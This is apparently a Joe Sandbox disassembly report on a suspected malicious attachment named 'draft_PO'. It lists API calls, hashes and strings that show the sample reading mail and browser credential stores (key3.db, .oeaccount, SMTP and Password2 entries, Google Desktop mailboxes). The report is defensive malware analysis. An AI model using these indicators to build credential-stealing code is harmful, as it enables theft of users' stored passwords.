                                                                                • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                  • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                  • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                  • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                  • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                  • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                • String ID:
                                                                                • API String ID: 2374668499-0
                                                                                • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040AD5B
                                                                                • memset.MSVCRT ref: 0040AD71
                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75920A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75920A60), ref: 00406D4D
                                                                                  • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                  • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                • sprintf.MSVCRT ref: 0040ADA8
                                                                                Strings
                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                • <%s>, xrefs: 0040ADA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                • API String ID: 3699762281-1998499579
                                                                                • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A3E
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A4C
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A5D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A74
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A7D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                APIs
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A3E
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A4C
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A5D
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A74
                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75920A60,?,00000000), ref: 00409A7D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                • free.MSVCRT ref: 00409B00
                                                                                  • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$free
                                                                                • String ID:
                                                                                • API String ID: 2241099983-0
                                                                                • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                APIs
                                                                                  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                • String ID:
                                                                                • API String ID: 2775283111-0
                                                                                • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                APIs
                                                                                • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                  • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                  • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                  • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                • String ID: $
                                                                                • API String ID: 2498372239-3993045852
                                                                                • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                • API String ID: 885266447-2471937615
                                                                                • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                APIs
                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                  • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                  • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID: Ul@$key3.db
                                                                                • API String ID: 1968906679-1563549157
                                                                                • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                APIs
                                                                                • _strcmpi.MSVCRT ref: 0040E134
                                                                                • _strcmpi.MSVCRT ref: 0040E14D
                                                                                • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi$_mbscpy
                                                                                • String ID: smtp
                                                                                • API String ID: 2625860049-60245459
                                                                                • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                APIs
                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                • memset.MSVCRT ref: 00408258
                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                Strings
                                                                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Close$EnumOpenmemset
                                                                                • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                • API String ID: 2255314230-2212045309
                                                                                • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C28C
                                                                                • SetFocus.USER32(?,?), ref: 0040C314
                                                                                  • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FocusMessagePostmemset
                                                                                • String ID: S_@$l
                                                                                • API String ID: 3436799508-4018740455
                                                                                • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy
                                                                                • String ID: C^@$X$ini
                                                                                • API String ID: 714388716-917056472
                                                                                • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                APIs
                                                                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                • String ID: MS Sans Serif
                                                                                • API String ID: 3492281209-168460110
                                                                                • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_strcmpimemset
                                                                                • String ID: edit
                                                                                • API String ID: 275601554-2167791130
                                                                                • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$_mbscat
                                                                                • String ID: 3CD
                                                                                • API String ID: 3951308622-1938365332
                                                                                • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$_mbscpy
                                                                                • String ID: Password2
                                                                                • API String ID: 2600922555-1856559283
                                                                                • Opcode ID: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                • Opcode Fuzzy Hash: de5dfba976b8437d2c47849deb952c43e7b11cdba93a79face7e306b42b81b64
                                                                                • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75920A60,?,00000000), ref: 00410D1C
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                • API String ID: 2574300362-543337301
                                                                                • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: rows deleted
                                                                                • API String ID: 2221118986-571615504
                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
